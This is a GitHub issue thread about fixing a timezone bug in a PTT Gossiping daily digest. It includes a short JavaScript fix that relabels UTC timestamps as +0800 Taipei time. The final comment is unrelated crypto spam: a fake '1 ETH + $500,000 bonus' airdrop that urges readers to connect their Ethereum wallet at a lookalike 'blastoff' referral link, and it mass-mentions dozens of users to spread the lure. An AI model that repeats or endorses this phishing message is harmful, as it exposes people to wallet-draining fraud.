### ISSUE TITLE
內文時區調整

### ISSUE THREAD

**Issue by aldy120** [aldy120/ptt-gossiping-daily#1]
顯示的時間錯誤。點進去內文看時間是 +0800 的才對。

```
1. [問卦] 笑死！男女參加聯誼的資格也差太多了吧? - 2024-03-20T20:58:57.000Z
https://www.ptt.cc/bbs/Gossiping/M.1710939539.A.02A.html
```

`2024-03-20T20:58:57.000Z` 應改為 `2024-03-20T20:58:57.000+0800`

**Comment by aldy120** [comment]
採用格式化後的台北時間作為輸出。


```js
const options = {
    timeZone: 'Asia/Taipei',
    timeStyle: 'long',
    dateStyle: 'full'
};
// The datetime returned from the API response is wrong
const wrongTime = article.datetime;
const correctTime = wrongTime.substring(0, wrongTime.length - 1) + '+0800';        
const timeTaipei = new Date(correctTime).toLocaleString('zh-TW', options);

```

**Comment by Lirikkk** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
rolal, @cdyfng, @HulKSmasH996, @scriptArchitect, @adr1enbe4udou1n, @Lakshmivallala, @badkimchi, @taudep, @damiisdandy, @prashansanb, @chordmo, @hastebrot, @Sigurthorb, @jeanpro, @IngeniousArtist, @ewanhohou, @themacmarketer, @danvitoriano, @alfg, @KaiHotz, @froguez, @delicious-DLC, @abdulmanann, @KISSMonX, @TACO-Chloe, @sethfork, @souhaibdjaballah, @ayoungh, @Williamyzd, @Guisong-Fu, @quangloc99, @Lazymindz, @cpowlett, @nike-sg, @islamzatary, @wenh06, @shriharip, @axelbunt, @ozgurhalilince, @ettore26, @lesenelir, @EliseuOlv, @Serge-Ntumba, @Aniamon, @sffej, @DReigada, @paraschetal, @sourabhtk37, @shevah, @smithkyle
